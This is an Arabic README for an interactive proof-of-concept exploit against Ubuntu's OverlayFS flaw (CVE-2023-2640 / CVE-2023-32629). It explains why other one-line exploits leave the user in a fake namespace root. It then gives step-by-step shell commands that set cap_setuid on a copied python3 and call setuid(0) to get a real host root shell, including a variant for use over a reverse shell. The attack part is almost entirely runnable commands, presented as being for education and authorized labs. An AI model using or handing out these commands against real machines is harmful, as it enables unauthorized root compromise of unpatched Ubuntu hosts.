
استغلال نظيف وتفاعلي متعدد الخطوات لتصعيد الامتيازات المحلية (LPE) لنظام Ubuntu عبر OverlayFS (GameOver(lay))، والذي يهرب من حاوية مساحة المستخدم (user namespace) لإسقاط غلاف جذر حقيقي للمضيف.
إثبات مفهوم تفاعلي متعدد الخطوات لتصعيد الامتيازات المحلية (LPE) يستهدف ثغرات نظام الملفات OverlayFS في نواة أوبونتو لينكس (CVE-2023-2640 / CVE-2023-32629).
على عكس الأوامر الآلية القياسية التي تحبس شاشتك التفاعلية داخل مساحة مستخدم مقيدة (جذر مزيف)، تقسم هذه المنهجية تسلسل الاستغلال لإسقاط جذر مضيف حقيقي غير مقيد بأمان.
تقوم العديد من الاستغلالات العامة بربط الإعداد والتنفيذ معًا باستخدام تسلسل أوامر شل آلي واحد مثل هذا:
unshare -rm sh -c "mkdir l u w m && ... && touch m/*; python3 -c '...'"
لأن حمولة تنفيذ بايثون مضمنة داخل علامات اقتباس unshare المزدوجة، فإنها تنفذ داخليًا داخل صندوق مساحة المستخدم.
uid=0(root)، لكن شاشتك معزولة تشفيريًا عن المضيف. إذا حاولت عرض دليل جذر المضيف (cd /root)، ستواجه خطأ Permission Denied.يقسم إثبات المفهوم هذا العملية إلى مرحلتين منطقيتين متميزتين:
unshare لمنح صلاحيات الجذر المزيفة فقط لفترة كافية لاستغلال ثغرة ovl_copy_up في OverlayFS، لتسريب قدرة setcap cap_setuid+eip عالية الامتياز إلى مجلد بايثون ثنائي محلي.os.setuid(0)، ويمنحك صلاحيات إدارة حقيقية على مستوى المضيف.ovl_copy_up_meta_inode_data في نواة أوبونتو يسمح بتجاوز فحوصات التحقق بالكامل أثناء ترحيل الملفات.6.2.0-26-generic.exploit.sh إلى الجهاز الهدف (مثلاً داخل /tmp).chmod +x exploit.sh
./exploit.sh
إذا كنت تعمل عبر شل عكسي متقلب، نفذ هذه الأوامر بشكل منفصل تمامًا، واضغط Enter بعد كل سطر:
# 1. Clean workspace environment
cd /tmp && rm -rf l u w m
# 2. Forge the backdoor within the temporary namespace sandbox
unshare -rm sh -c "mkdir l u w m && cp /usr/bin/python3 l/ && setcap cap_setuid+eip l/python3 && mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*"
# 3. Trigger execution on the real host to claim true root
./u/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
تحقق من صلاحياتك الحقيقية بفحص ملف المستخدم الحالي:
whoami
cat /root/root.txt
تم اكتشاف وتوثيق آليات الاستغلال الأساسية المستخدمة في إعادة الصياغة التفاعلية هذه بواسطة باحثي الأمن Liav Eliyahu و g1vi.
تم إنشاء هذا المستودع بدقة لأغراض تعليمية وبحث أمني واختبار اختراق مصرح به (مثل مختبرات HackTheBox / OffSec). لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام أو محاولات الوصول غير المصرح بها أو تلف البنية التحتية الناتج عن هذه المواد. استخدم بمسؤولية.